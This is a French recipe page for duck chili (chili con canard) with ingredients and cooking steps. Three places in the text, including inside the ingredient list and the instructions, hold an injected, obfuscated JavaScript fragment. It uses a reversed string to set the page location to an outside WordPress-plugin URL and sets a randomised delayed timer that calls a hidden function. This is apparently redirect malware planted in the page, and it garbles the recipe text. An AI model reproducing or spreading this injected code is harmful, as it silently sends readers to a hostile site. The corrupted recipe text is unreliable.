CHILI CON CANARD

CHILI CON CANARD

Pour 4 Pers.

INGRÉDIENTS :

– 400g d’aiguillettes de canard hachées ou coupées en petits cubes
– 500g d’haricots rouges en boîte, rincés et égouttés
– 1 boîte de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates concassées (400g)
– 1 oignon emincé
– 2 gousses d’ail émincées
– 1 cube de bouillon de poule dégraissé
– 3 CS de cumin en poudre1 CS de paprika en poudre
– huile d’olive
– sel / poivre, piment


Faire revenir l’ail et l’oignon dans une casserole. Ajouter le canard et cuire 2 minutes a feu vif. Ajouter les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomates et les épices. Cuire 2 minutes de plus.


Rajouter 30cl d’eau et le bouillon cube, baisser le feu, couvrir et cuire 20 minutes.


Ajouter les haricots et cuire 10 minutes supplémentaires sans couvrir.


Rectifier l’assaisonnement (si vous aimez manger épicé, n’hésitez pas à rajouter du piment).

Chili con Canardtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton” download>Télécharger

Leave comments

Your email is safe with us.

Ce site est protégé par reCAPTCHA et le GooglePolitique de confidentialité etConditions d'utilisation appliquer.